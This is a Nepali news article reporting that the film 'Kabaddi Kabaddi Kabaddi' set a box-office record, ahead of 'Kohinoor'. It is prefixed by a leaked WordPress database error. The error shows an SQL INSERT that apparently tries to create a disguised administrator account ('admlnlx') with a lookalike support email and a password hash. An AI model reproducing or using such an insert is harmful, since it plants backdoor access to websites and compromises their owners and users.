WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8BVxZvIY.AZ83Tj7oxbLUZAWjEs8F1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 16:09:41', '', 'admlnlx', 'admlnlx')
असोज १७, काठमाडौं । नेपाली चलचित्र “कबड्डी कबड्डी कबड्डी” ले नेपाली चलचित्रमा ऐतिहासिक रेकर्ड बनाएको छ ।
हलमा चल्न थालेको दुई हप्ताको अन्तरालमा चलचित्रले ११ करोड तीन लाखको ग्रस ब्यापार गरेको हो । चलचित्रको निर्माण पक्षले सार्वजनिक गरेको रिपोर्ट अनुसार पहिलो हप्ता सात करोडभन्दा बढीको व्यापार गरेको थियो ।
दयाहाङ राई, उपासना सिंह ठकुरी, कर्मा, विल्सन विक्रम राई र बुद्धि तामाङको मुख्य भूमिका रहेको “कबड्डी कबड्डी कबड्डी” ले उपत्यकाभित्र ६ करोडको ब्यापार गरेको अनलाइन खबर मा उल्लेख छ । काठमाडौंबाहिर भने पाँच करोडको मात्रै व्यापार भएको छ । हालसम्मको स्थिति हेर्दा “कोहिनूर” चलचित्रले बनाएको १० करोडको रेकर्ड तोड्न “कबड्डी कबड्डी कबड्डी” सफल भएको छ ।